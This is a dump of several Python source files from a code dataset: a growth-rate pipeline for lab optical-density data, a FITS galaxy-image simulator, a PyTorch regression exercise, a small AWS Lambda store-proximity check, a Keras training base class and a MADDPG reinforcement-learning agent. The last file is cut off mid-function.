file.\n\n\t:param odlog: path to od data\n\t:param blank: path to blank od data\n\t:param output: path for export\n\t\"\"\"\n\tblank_file = open(blank + '.dat', 'r')\n\tblank_content = blank_file.read()\n\tblank_file.close()\n\tblank_data = list(map(int, blank_content.split()))\n\tbtx = blank_data[0::2]\n\tbrx = blank_data[1::2]\n\n\todlog_file = open(odlog + '.dat', 'r')\n\todlog_content = odlog_file.readlines()\n\todlog_file.close()\n\tod_list = []\n\tfor line in odlog_content:\n\t\tline = list(map(int, line.split()))\n\t\ttemp_ods = [int(line[0])]\n\t\ttx = line[1::2]\n\t\trx = line[2::2]\n\t\tfor num in range(8):\n\t\t\tif tx[num] == 0 or rx[num] == 0 or brx[num] == 0 or btx[num] == 0:\n\t\t\t\ttemp_ods.append(0)\n\t\t\t\tcontinue\n\t\t\tblank_od = float(brx[num]) / float(btx[num])\n\t\t\tod_measure = float(rx[num]) / float(tx[num])\n\t\t\ttemp_ods.append(log10(blank_od/od_measure))\n\t\tod_list.append(temp_ods)\n\todfile = open(output + '.csv', 'w')\n\twrod = csv.writer(odfile, quoting=csv.QUOTE_ALL)\n\twrod.writerows(od_list)\n\todfile.close()\n\n\ndef u_rate(intake, output):\n\t\"\"\"\n\tCalculates growth rate data based on dilutions (u) and saves to csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\tnew_data_r = []\n\ttime_start = df.iloc[0, 0]\n\tprevious_time = df.iloc[0, 0]\n\ttime_difference = 0\n\tfor row in df.itertuples():\n\t\tnew_row = []\n\t\trow_id = True\n\t\t# Iterates through each row and row element in data frame\n\t\t# adds calculated growth rates to new row array, which is added to new data array\n\t\tfor element in row:\n\t\t\t# Disregard first element (row number added by pandas when data frame is made)\n\t\t\tif row_id:\n\t\t\t\trow_id = False\n\t\t\t\tcontinue\n\t\t\t# Second element is the time point and time difference is calculated (should always be 60 sec)\n\t\t\telif len(new_row) == 0:\n\t\t\t\tnew_row.append(element - time_start)\n\t\t\t\ttime_difference = element - previous_time\n\t\t\t\tprevious_time = element\n\t\t\t# If first row of data frame (determined by time point) or zero value, it is arbitrarily set to zero\n\t\t\telif element == 0 or new_row[0] == 0:\n\t\t\t\tnew_row.append(float(0))\n\t\t\t# Rest of elements will be values that do not cause errors when calculating growth rate\n\t\t\telse:\n\t\t\t\tnew_row.append(round((numpy.log(1 + (element / 15000)) / time_difference), 6)) # pylint: disable=E1101\n\t\tnew_data_r.append(new_row)\n\n\tnumpy.savetxt('{}.csv'.format(output), new_data_r, delimiter=\",\")\n\n\ndef od_rate(experiment, output):\n\t\"\"\"\n\tCalculates growth rate data based on optical density (od) and saves to csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(experiment), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\tnew_data_r = []\n\ttime_start = df.iloc[0, 0]\n\tprevious_time = df.iloc[0, 0]\n\ttime_difference = 0\n\tprevious_od = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\tfor row in df.itertuples():\n\t\tnew_row = []\n\t\trow_id = True\n\t\tch_count = 0\n\t\t# Iterates through each row and row element in data frame\n\t\t# adds calculated growth rates to new row array, which is added to new data array\n\t\tfor element in row:\n\t\t\t# Disregard first element (row number added by pandas when data frame is made)\n\t\t\tif row_id:\n\t\t\t\trow_id = False\n\t\t\t\tcontinue\n\t\t\t# 
Second element is the time point and time difference is calculated (should always be 60 sec)\n\t\t\telif len(new_row) == 0:\n\t\t\t\tnew_row.append(element - time_start)\n\t\t\t\ttime_difference = element - previous_time\n\t\t\t\tprevious_time = element\n\t\t\t\tcontinue\n\t\t\t# If first row of data frame (determined by time point) it is arbitrarily set to zero\n\t\t\telif new_row[0] == 0:\n\t\t\t\tnew_row.append(float(0))\n\t\t\t# Negative OD's are ignored with growth rate being a blank space\n\t\t\telif element < 0 or previous_od[ch_count] < 0:\n\t\t\t\tnew_row.append(None)\n\t\t\t\tprevious_od[ch_count] = element\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tnew_row.append(round((numpy.log(element / previous_od[ch_count]) / time_difference), 6)) # pylint: disable=E1101\n\t\t\t\t# If the growth rate calculation fails (it will for values <= 0) then append a blank space\n\t\t\t\texcept (Warning, Exception) as err:\n\t\t\t\t\t# For showing the warning or exception, uncomment the below line\n\t\t\t\t\t# print('{}'.format(err))\n\t\t\t\t\tnew_row.append(None)\n\t\t\t\t# Each element is saved for comparison with the next element of that chamber\n\t\t\t\tprevious_od[ch_count] = element\n\t\t\tch_count += 1\n\t\tnew_data_r.append(new_row)\n\n\tdf = pandas.DataFrame(new_data_r)\n\tdf.to_csv(path_or_buf='{}.csv'.format(output), index=False)\n\n\ndef statistics(intake, output, interval, block):\n\t\"\"\"\n\tAnalyzes growth rate csv for general statistics (averages, standard deviation, and standard error).\n\n\t:param intake: path to data\n\t:param output: path for export\n\t:param interval: modify default hour time interval by multiplication\n\t:param block: path to blocklog file\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\n\t# if blocklog file is specified, then separate stats into blocks\n\tif len(block) > 0:\n\t\t# for each chamber, will iterate through dataframe and iterate through blocklog data as each block time is reached\n\t\tblocklog_file = open(block, 'r')\n\t\tblocklog = list(csv.reader(blocklog_file))\n\t\tblocklog_file.close()\n\t\tfor chamber in range(2, 10):\n\t\t\t# for first blocklog row, define setpoint, next setpoint, start of block, end of block, block, and blocklog row \n\t\t\tsetpoint = float(blocklog[0][2].split(',')[chamber-2])\n\t\t\tnext_setpoint = float(blocklog[1][2].split(',')[chamber-2])\n\t\t\trow_start = 0\n\t\t\trow_end = float(blocklog[0][4])\n\t\t\tblock = 1\n\t\t\tblock_row = 1\n\t\t\tstart_time = 0\n\t\t\tend_time = 0\n\t\t\tnew_block_r = []\n\t\t\tblock_r = [['Block', 'Mean', 'SD', 'SE', 'Block Start', 'Block End', 'Start Time', 'End Time', 'n']]\n\t\t\tfor row in df.itertuples():\n\t\t\t\t# if element is a number (not a NaN) then add to block\n\t\t\t\tif not math.isnan(row[chamber]):\n\t\t\t\t\tnew_block_r.append(row[chamber])\n\t\t\t\t\tend_time = row[1]\n\t\t\t\t# if the end of the block has been reached, save stats on that block\n\t\t\t\tif row[1] >= row_end and len(new_block_r) >= 1:\n\t\t\t\t\tnum = len(new_block_r)\n\t\t\t\t\tmean = numpy.mean(new_block_r)\n\t\t\t\t\tsd = numpy.std(new_block_r)\n\t\t\t\t\tsem = sd / numpy.sqrt(num)\n\t\t\t\t\t# compare current and next setpoint, if greater then it is a block period, if less then it is a dilution period (marked as 0)\n\t\t\t\t\tif setpoint > next_setpoint:\n\t\t\t\t\t\tblock_r.append([block, mean, sd, sem, row_start, row_end, start_time, end_time, num])\n\t\t\t\t\t\tblock += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tblock_r.append([0, mean, sd, sem, row_start, row_end, start_time, end_time, num])\n\t\t\t\t\t# iterate to next blocklog row, start of block, end of block, setpoint, and next setpoint\n\t\t\t\t\tblock_row += 1\n\t\t\t\t\trow_start = row_end\n\t\t\t\t\tsetpoint = next_setpoint\n\t\t\t\t\ttry:\n\t\t\t\t\t\trow_end = float(blocklog[block_row][4])\n\t\t\t\t\t\tnext_setpoint = float(blocklog[block_row][2].split(',')[chamber-2])\n\t\t\t\t\texcept:\n\t\t\t\t\t\trow_end = numpy.mean(df.tail(2)['Time'])\n\t\t\t\t\t\tnext_setpoint = float(blocklog[block_row-2][2].split(',')[chamber-2])\n\t\t\t\t\tnew_block_r = []\n\t\t\t\t\tstart_time = row[1]\n\t\t\tstats = pandas.DataFrame(block_r)\n\t\t\tstats.to_csv(path_or_buf='{}/ch{}.csv'.format(output, chamber-1), index=False, header=False)\n\t# otherwise separate stats by hour\n\telse:\n\t\t# for each chamber, iterate through dataframe to calculate stats\n\t\tfor chamber in range(2, 10):\n\t\t\tstart_time = 0\n\t\t\tend_time = 0\n\t\t\tnew_block_r = []\n\t\t\t# multiply the default 1 hour by the command line argument\n\t\t\thour = 1 * float(interval)\n\t\t\tblock_r = [['Hour', 'Mean', 'SD', 'SE', 'Start Time', 'End Time', 'n']]\n\t\t\tfor row in df.itertuples():\n\t\t\t\t# if element is a number (not a NaN) then add to block\n\t\t\t\tif not math.isnan(row[chamber]):\n\t\t\t\t\tnew_block_r.append(row[chamber])\n\t\t\t\t\tend_time = row[1]\n\t\t\t\t# if the end of the hour unit has been reached, then save stats on that hour\n\t\t\t\tif row[1] >= hour and len(new_block_r) >= 1:\n\t\t\t\t\tnum = len(new_block_r)\n\t\t\t\t\tmean = numpy.mean(new_block_r)\n\t\t\t\t\tsd = numpy.std(new_block_r)\n\t\t\t\t\tsem = sd / numpy.sqrt(num)\n\t\t\t\t\tblock_r.append([hour, mean, sd, sem, start_time, end_time, num])\n\t\t\t\t\t# multiply the default 1 hour by the command line argument\n\t\t\t\t\thour += 1 * float(interval)\n\t\t\t\t\tnew_block_r = []\n\t\t\t\t\tstart_time = row[1]\n\t\t\tstats = pandas.DataFrame(block_r)\n\t\t\tstats.to_csv(path_or_buf='{}/ch{}.csv'.format(output, chamber-1), index=False, header=False)\n\n\ndef graphs(args, intake, output, limits):\n\t\"\"\"\n\tCreates a scatter plot for each chamber based on defined x and y limits and a data set csv.\n\n\t:param args: command line argument array for error bar and data set parsing\n\t:param intake: path to data\n\t:param output: path for export\n\t:param limits: x and y limits to use for graphs\n\t\"\"\"\n\tif '2' in args.graph or '4' in args.graph:\n\t\tfor chamber in range(1, 9):\n\t\t\tdf = pandas.read_csv('{}/ch{}.csv'.format(intake, chamber), header=1, names=['Hour', 'Mean', 'SD', 'SE', 'Start Time', 'End Time', 'n'])\n\t\t\tif args.sd:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean', yerr='SD')\n\t\t\telif args.se:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean', yerr='SE')\n\t\t\telse:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean')\n\t\t\t# If x or y limits are not zero, then resize graph to the inputted limits\n\t\t\tif limits[0] != limits[1]:\n\t\t\t\tplt.xlim(limits[0], 
limits[1])\n\t\t\tif limits[2] != limits[3]:\n\t\t\t\tplt.ylim(limits[2], limits[3])\n\t\t\tplt.savefig('{}/ch{}.png'.format(output, chamber))\n\t\t\tplt.close()\n\telse:\n\t\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\t\tfor chamber in range(1, 9):\n\t\t\tdf.plot.scatter(x='Time', y='{}'.format(chamber))\n\t\t\t# If x or y limits are not zero, then resize graph to the inputted limits\n\t\t\tif limits[0] != limits[1]:\n\t\t\t\tplt.xlim(limits[0], limits[1])\n\t\t\tif limits[2] != limits[3]:\n\t\t\t\tplt.ylim(limits[2], limits[3])\n\t\t\tplt.savefig('{}/ch{}.png'.format(output, chamber))\n\t\t\tplt.close()\n\t\t\t\n\ndef log_functions(args, paths, process_log, exp):\n\t\"\"\"\n\tPrints and/or updates the log of processes from this growth rate program based on command line arguments.\n\n\t:param args: command line argument array for deciding print and/or file write-out\n\t:param paths: list with config file paths\n\t:param process_log: log for keeping track of processes\n\t:param exp: path to experiment\n\t\"\"\"\n\tif args.print:\n\t\tprint(process_log)\n\tif args.log:\n\t\t# if previous process log file found, save contents before overwriting\n\t\tif os.path.exists(exp + paths['log processes'] + '.log'):\n\t\t\tprocess_log += '\\nPrevious process log found, will add to content.'\n\t\t\twith open(exp + paths['log processes'] + '.log', 'r') as log_file:\n\t\t\t\told_log = log_file.read()\n\t\t\t\tprocess_log = process_log + '\\n\\n' + old_log\n\t\t\tlog_file.close()\n\t\telse:\n\t\t\tprocess_log += '\\nNo process log found, will create new.'\n\t\twith open(exp + paths['log processes'] + '.log', 'w') as log_file:\n\t\t\tlog_file.write(process_log)\n\t\tlog_file.close()\n\n\nmain()\n","sub_path":"Growth-Pipe.py","file_name":"Growth-Pipe.py","file_ext":"py","file_size_in_byte":29501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"215422937","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\nimport pyfits as pf\nimport pylab as pl\nimport scipy.signal as sig\nimport numpy as np\nimport numpy.fft as fft\nfrom math import *\nfrom scipy import random\nfrom fits_lib import *\n\nmaxROW = 4096\nmaxCOL = 4096\nhdulist = pf.open('blank.fits')\nflux20=hdulist[0].header['FLUX20']\nexptime=hdulist[0].header['EXPTIME']\ncrpix1=hdulist[0].header['CRPIX1']\ncrpix2=hdulist[0].header['CRPIX2']\ncrval1=hdulist[0].header['CRVAL1']\ncrval2=hdulist[0].header['CRVAL2']\ncd1_1=hdulist[0].header['CD1_1']\ncd1_2=hdulist[0].header['CD1_2']\ncd2_1=hdulist[0].header['CD2_1']\ncd2_2=hdulist[0].header['CD2_2']\nhdulist.close()\n\ndef RADECtoRowCol(RA,DEC):\n\trow = 1/(cd1_2*cd2_1-cd1_1*cd2_2)*(cd2_1*(RA-crval1)-cd1_1*(DEC-crval2))+crpix2\n\tcol = 1/(cd1_2*cd2_1-cd1_1*cd2_2)*(-cd2_2*(RA-crval1)+cd1_2*(DEC-crval2))+crpix1\n\treturn (int(row),int(col))#double-check this later\n\ndef psersic(Re,n,m,xc,yc,x,y,el,theta):\n\tbn = 2*n-0.324\n\tln = mToCounts(m,20,flux20)\n\tI0 = ln*bn**2/((Re**2)*2*pi*n*gamma(2*n))\n\tE = sqrt(((x-xc)*cos(theta)+(y-yc)*sin(theta))**2+((x-xc)*sin(theta)-(y-yc)*cos(theta))**2/(1-el)**2)\n\tI = I0*exp(-bn*(E/Re)**(1/n))\n\treturn I\n\ndef mToCounts(m, m0, F0):\n\treturn exptime*F0*10**(-2/5*(m-m0))\n\ndef addStar(hdu, m, RA, DEC):\n\t(ROW,COL) = RADECtoRowCol(RA,DEC)\n\tif 0 <= ROW < maxROW and 0 <= COL < maxCOL:\t\n\t\thdu[ROW,COL] += mToCounts(m,20,flux20)\n\t\t#print ROW,COL,mToCounts(m,20,flux20)\n\treturn\n\ndef addStellarCatalog(hdu, catalog):\n\tfor linea in open(catalog):\n\t\tlinea = linea.strip()\n\t\tobj, ra, dec,mag,sed,index,tipo = linea.split()\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tmag = float(mag)\n\t\t#print ra,dec,RADECtoRowCol(ra,dec)\n\t\taddStar(hdu,mag,ra,dec)\n\treturn\n\ndef addGalaxy(hdu, m, RA, DEC, n, Re, el, theta):\n\t(ROW,COL)=RADECtoRowCol(RA,DEC)\n\tif 0 <= ROW < maxROW and 0 <= COL < maxCOL:\t\n\t\ta1=int(ROW-5*Re)\n\t\tb1=int(ROW+5*Re)\n\t\ta2=int(COL-5*Re)\n\t\tb2=int(COL+5*Re)\n\t\tfor y in range(a1,b1):\n\t\t\tfor x in range(a2,b2):\n\t\t\t\tif 0 <= y < maxROW and 0 <= x < maxCOL:\n\t\t\t\t\thdu[y,x] += psersic(Re,n,m,COL,ROW,x,y,el,theta)\n\t\t#hdu[ROW,COL]+=mToCounts(m,20,flux20)*(2*n-0.324)**2/((Re**2)*2*pi*n*gamma(2*n))\n\t\t#print ROW,COL, mToCounts(m,20,flux20)*(2*n-0.324)**2/((Re**2)*2*pi*n*gamma(2*n))\n\treturn\n\ndef addGalaxyCatalog(hdu, catalog):\n\ti=0\n\tfor linea in open(catalog):\n\t\tlinea = linea.strip()\n\t\tobj, ra, dec,mag,sed,redshift,tipo,n,re,elip,o = linea.split()\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tmag = float(mag)\n\t\tn = float(n)\n\t\tre = float(re)\n\t\telip = float(elip)\n\t\to = float(o)\n\t\taddGalaxy(hdu,mag,ra,dec,n,re,elip,o)\n\t\ti += 1\n\t\t# if i > 100: break\n\treturn\n\ndef addBackground (hdu, background):\n\thdu += background\n\treturn\n\ndef convolvePSF (hdu, sigma):\n\tN = 10\n\tx = np.zeros((N,N)) + np.arange(N)\n\ty = x.transpose()\n\t\n\tsigma_x = sigma\n\tsigma_y = sigma\n\ts = 0.01/(2*np.pi*sigma_x*sigma_y)\n\tx_zero = N/2\n\ty_zero = N/2\n\tgaussian = np.exp(-((x-x_zero)**2.0/(2*sigma_x**2.0)+(y-y_zero)**2.0/(2*sigma_y**2.0)))/(2*np.pi*sigma_x*sigma_y)\n\tgaussian = gaussian #+ random.standard_normal((N,N)) * s\n\n\t# plot (gaussian, \"PSF\", \"04_PSF\")\t\n\t# plot2D(x,y,gaussian,\"PSF\")\n\n\tC = sig.convolve (hdu, gaussian, 'same')\n\thdu[:][:] = C[:][:]\n \ndef addNoise (hdu, sigma):\n    # Adds Gaussian noise with standard deviation sigma to hdu.\n    hdu += random.standard_normal((maxROW,maxCOL))*sigma\n\ndef filterImage (hdu, params):\n    # Filters hdu using the parameters params.\n    fft_cut = params[0]\n    header = params[1]\n\n    Y = fft.fft(hdu)\n    # plot_image(Y,log_scale=True)\n\n    N = len(hdu)\n\n    N_corte = fft_cut\n    for i in range(N):\n    \tfor j in range(N):\n    \t\tif ((i+N/2)%N - N/2)**2 + ((j+N/2)%N - N/2)**2 > (N_corte)**2:\n    \t\t\tY[i][j] = 0.0\n\n    # Ymin = np.abs(Y).min()\n    # Y[fft_cut : N - fft_cut] = 0.\n    # Yabs = np.abs(Y)\n    # plot (np.log(Yabs * (Yabs > 0) + (Yabs <= 0)*Ymin*1e-1), \"FFT\", \"06_FFT_cut\")\n\n    y1 = np.abs((fft.ifft (Y)))\n    hdu[:][:] = y1[:][:]\n","sub_path":"metodos_t1.py","file_name":"metodos_t1.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"332430853","text":"from pandas.io.parsers import read_csv\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nimport pandas as pd\n\ndf = read_csv('C:\\\\Users\\\\simon\\\\OneDrive\\\\Dokumenter\\\\NTNU\\\\Dataingeniør 2021-2022\\\\Høst\\\\IDATT2502 - Anvendt maskinlæring med prosjekt\\\\ObligsMachineLearning\\\\Oblig1\\\\day_head_circumference.csv', skiprows=0)\n\nx_axis = df.iloc[:,0].values\ny_axis = df.iloc[:,1].values\n\nx_train = torch.tensor([x_axis], dtype=torch.float32).reshape(-1, 1)\ny_train = torch.tensor([y_axis], dtype=torch.float32).reshape(-1, 1)\n\nclass LinearRegressionModel:\n    def __init__(self): \n        # Model variables\n        self.W = torch.tensor([[0.0]], requires_grad=True)  # requires_grad enables calculation of gradients\n        self.b = torch.tensor([[0.0]], requires_grad=True)\n    \n    # Predictor\n    def f(self, x):\n        return (20*torch.sigmoid(x @ self.W + self.b) + 31) \n\n    # Uses Mean Squared Error\n    def loss(self, x, y):\n        return torch.nn.functional.mse_loss(self.f(x), y)\n\nmodel = LinearRegressionModel()\n\n# Optimize: adjust W and b to minimize loss using stochastic gradient descent\noptimizer = torch.optim.SGD([model.W, model.b], 0.000001)\n\nfor epoch in range(1000000):\n    model.loss(x_train, y_train).backward()  # Compute loss gradients\n    optimizer.step()  # Perform optimization by 
adjusting W and b,\n\n optimizer.zero_grad() # Clear gradients for next step\n\n# Print model variables and loss\nprint(\"W = %s, b = %s, loss = %s\" % (model.W, model.b, model.loss(x_train, y_train)))\n\n# Visualize result\nplt.plot(x_train, y_train, 'o', label='$(x^{(i)},y^{(i)})$')\nplt.xlabel('x')\nplt.ylabel('y')\n\nx = torch.arange(torch.min(x_train), torch.max(x_train), 1.0).reshape(-1, 1)\nplt.plot(x, model.f(x).detach(), label='$\\\\hat y = f(x) = sigmoid(xW + b) + 31')\n\nplt.legend()\nplt.show()\n\n","sub_path":"Oblig1/SolutionC.py","file_name":"SolutionC.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328076123","text":"import json\nimport pymongo\nimport boto3\nimport base64\nimport configparser\nimport os\nimport ast\nimport requests\nimport confidential\nfrom bson.son import SON\n\nDIST_THRESHOLD = 16000000\n\nclient = None\n\ndef lambda_handler(event, context):\n global client\n\n if not client:\n client = pymongo.MongoClient(confidential.MONGO)\n\n body = json.loads(event[\"body\"])\n\n user_lat = body[\"latitude\"]\n user_lon = body[\"longitude\"]\n \n if (user_lat == None or user_lon == None):\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({ \"available\" : True })\n }\n\n db = client[\"database0\"]\n stores = db[\"stores\"]\n\n query = {\"coordinates\": {\"$near\": SON([(\"$geometry\", SON([(\"type\", \"Point\"), (\"coordinates\", [user_lon, user_lat])])), (\"$maxDistance\", DIST_THRESHOLD)])}}\n \n r = stores.find_one(query)\n\n if not r:\n \treturn {\n \t\t\"statusCode\": 200,\n \t\t\"body\": json.dumps({ \"available\" : False })\n \t}\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({ \"available\" : True })\n }\n","sub_path":"lambda/src/check-region-availability.py/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"604930236","text":"import utils\nimport sklearn\nimport numpy as np\nfrom pathlib import Path\nfrom tf_imports import K, tf_summary\nfrom tf_imports import EarlyStopping\nfrom abc import ABC, abstractmethod\nfrom callbacks import OutputCheckpoint, TensorBoard2, CheckNanLoss\nfrom keras.utils import plot_model\n\n\nclass BaseModel(ABC):\n def __init__(self, input_shape):\n self.input_shape = input_shape\n self.optimizer = None\n self.loss = None\n\n model = self._create_model(input_shape)\n # model.summary()\n\n self.model = model\n self.model_compiled = False\n\n @abstractmethod\n def _create_model(self, input_shape):\n pass\n\n @abstractmethod\n def plot_model(self, save_to_dir):\n pass\n\n @staticmethod\n def _plot_model(model, file_path):\n plot_model(model, to_file=file_path, show_shapes=True, show_layer_names=True)\n print(model.summary())\n\n def compile(self, optimizer, loss):\n if self.model_compiled:\n raise Exception(\"The model was already compiled.\")\n\n self._compile(optimizer, loss)\n\n @abstractmethod\n def _compile(self, optimizer, loss):\n pass\n\n def train(self, x, y, batch_size, out_folder, output_checkpoint_inputs_word2vec=None):\n if not self.model_compiled:\n raise Exception(\"The model must be compiled first.\")\n\n train_uid = utils.uid()\n description = \"{train_uid} batch={batch_size} cfg_index={cfg_idx}\"\\\n .format(train_uid=train_uid, batch_size=batch_size, cfg_idx=self.cfg_idx)\n print(\"Training: {}\".format(description))\n\n # callbacks\n callbacks = []\n\n early_stopping 
= EarlyStopping(\n monitor='val_loss',\n min_delta=0.02,\n patience=20,\n verbose=1,\n mode='min',\n restore_best_weights=True)\n callbacks.append(early_stopping)\n\n check_nan = CheckNanLoss('val_loss')\n callbacks.append(check_nan)\n\n tensor_board_log_dir = Path(out_folder, \"tensorboard\", description)\n tensor_board_log_dir.mkdir(parents=True, exist_ok=True)\n tensor_board_writer = tf_summary.FileWriter(str(tensor_board_log_dir), K.get_session().graph)\n\n if output_checkpoint_inputs_word2vec is not None:\n output_checkpoint = OutputCheckpoint(\n tensor_board_writer=tensor_board_writer,\n val_data=(x[:4], y[:4]),\n test_data_input_word2vec=output_checkpoint_inputs_word2vec,\n print_every=30)\n callbacks.append(output_checkpoint)\n\n # last because close the writer on training end\n tensor_board = TensorBoard2(writer=tensor_board_writer, batch_size=batch_size)\n callbacks.append(tensor_board)\n\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(x, y, train_size=0.8, shuffle=True)\n\n # fit\n self.model.fit(\n x=x_train,\n y=y_train,\n epochs=300,\n batch_size=batch_size,\n verbose=1,\n shuffle=True,\n callbacks=callbacks,\n validation_data=(x_test, y_test),\n )\n\n # save\n weights_path = Path(out_folder, \"weights\", \"{}.h5\".format(description))\n weights_path.parent.mkdir(parents=True, exist_ok=True)\n # self.model.save_weights(str(weights_path))\n\n def load_weights(self, weights_file_path):\n if not Path(weights_file_path).exists():\n raise Exception(\"weights file '{}' not found.\".format(weights_file_path))\n\n self.model.load_weights(str(weights_file_path))\n\n def predict(self, x_predict):\n prediction = self.model.predict(x=x_predict, batch_size=128)\n return prediction\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419238243","text":"# --------------------------------------\n# Multi-Agent Deep Deterministic Policy Gradient (MADDPG)\n# Author: Adrian Chow\n# Date: 2020.1.16\n# Reference: https://papers.nips.cc/paper/2017/file/68a9750337a418a86fe06c1991a1d64c-Paper.pdf\n# Purpose: Adaption for Multi-Agent Environments for DDPG\n# --------------------------------------\n\nimport numpy as np\nfrom collections import namedtuple, deque\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom OUNoise import OrnsteinUhlenbeckNoise\nfrom Networks import Actor, Critic\nfrom Buffer import ReplayBuffer\n\nBUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 250 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR_ACTOR = 1e-4 # learning rate of the actor \nLR_CRITIC = 1e-3 # learning rate of the critic\nWEIGHT_DECAY = 0. 
# L2 weight decay\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass MADDPG:\n \"\"\" Class for training multiple agents in the multi-agent environment\"\"\"\n\n def __init__(self, state_size, action_size, num_agents, seed):\n \n super(MADDPG, self).__init__()\n self.state_size = state_size\n self.action_size = action_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)\n\n # Initialize agents in the multi-agent environment\n self.DDPGs = [DDPG(state_size, action_size, num_agents, seed) for i in range(num_agents)]\n \n # Replay Buffer (shared by all agents)\n self.memory = ReplayBuffer(action_size, num_agents, BUFFER_SIZE, BATCH_SIZE, seed, device)\n\n\n def act(self, states, add_noise=True):\n \"\"\"Returns actions for each agent.\"\"\"\n\n return [agent.act(state, add_noise) for agent, state in zip(self.DDPGs, states)]\n\n\n def step(self, states, actions, rewards, next_states, dones):\n\n self.memory.add(states, actions, rewards, next_states, dones)\n \n for agent in self.DDPGs:\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample()\n agent.step(experiences, GAMMA)\n \n\n def reset(self):\n \"\"\" Reset Agents \"\"\"\n for agent in self.DDPGs:\n agent.reset() \n\n\n def save_weights(self):\n for index, agent in enumerate(self.DDPGs):\n torch.save(agent.actor.state_dict(), 'agent{}_checkpoint_actor.pth'.format(index+1))\n torch.save(agent.critic.state_dict(), 'agent{}_checkpoint_critic.pth'.format(index+1))\n\n\nclass DDPG:\n \"\"\" Base Class for an Agent in the multi-agent environment\"\"\"\n\n def __init__(self, \n state_size, \n action_size,\n num_agents,\n seed, \n hidden_in_actor=200,\n hidden_out_actor=150,\n hidden_in_critic=200, \n hidden_out_critic=150, \n lr_actor=LR_ACTOR, \n lr_critic=LR_CRITIC):\n\n super(DDPG, self).__init__()\n\n self.state_size = state_size\n self.action_size = action_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)\n \n self.actor = Actor(state_size, \n action_size,\n seed,\n hidden_in_actor,\n hidden_out_actor).to(device)\n\n self.target_actor = Actor(state_size, \n action_size,\n seed,\n hidden_in_actor,\n hidden_out_actor).to(device)\n\n self.critic = Critic(state_size, \n action_size,\n num_agents,\n seed,\n hidden_in_critic,\n hidden_out_critic).to(device)\n\n self.target_critic = Critic(state_size, \n action_size,\n num_agents,\n seed,\n hidden_in_critic,\n hidden_out_critic).to(device)\n \n # Ornstein Uhlenbeck Noise for Action Space Exploration\n self.noise = OrnsteinUhlenbeckNoise(action_size, seed) \n\n # Initialize targets same as original networks\n self.copy_weights(self.critic, self.target_critic)\n self.copy_weights(self.actor, self.target_actor)\n\n # Actor and Critic Adam Optimizers\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=lr_actor)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=lr_critic)\n\n\n def act(self, state, add_noise=True):\n \"\"\"Returns actions for given state as per current policy.\"\"\"\n \n state = torch.from_numpy(state).float().to(device)\n self.actor.eval()\n with torch.no_grad():\n action = self.actor(state).cpu().data.numpy()\n self.actor.train()\n if add_noise:\n action += self.noise.noise()\n return np.clip(action, -1, 1)\n\n\n def step(self, experiences, gamma):\n self.learn(experiences, gamma)\n\n\n def learn(self, experiences, gamma):\n \"\"\"Update policy and value parameters using given batch of experience tuples.\n Q_targets = r + γ * target_critic(next_state, 
target_actor(next_state))\n        where:\n            target_actor(state) -> action\n            target_critic(state, action) -> Q-value\n        Params\n        ======\n            experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples \n            gamma (float): discount factor\n        \"\"\"\n\n        states, actions, rewards, next_states, dones = experiences\n\n        next_states_tensor = torch.cat(next_states, dim=1).to(device)\n        states_tensor = torch.cat(states, dim=1).to(device)\n        actions_tensor = torch.cat(actions, dim=1).to(device) \n\n        # ---------------------------- update critic ---------------------------- #\n        # Get predicted next-state actions and Q values from target models\n        \n        next_actions = [self.target_actor(next_state) for next_state in next_states] \n        next_actions_tensor = torch.cat(next_actions, dim=1).to(device) \n        Q_targets_next = self.target_critic(next_states_tensor, next_actions_tensor)\n        # Compute Q targets for current states (y_i)\n        Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n        # Compute critic loss\n        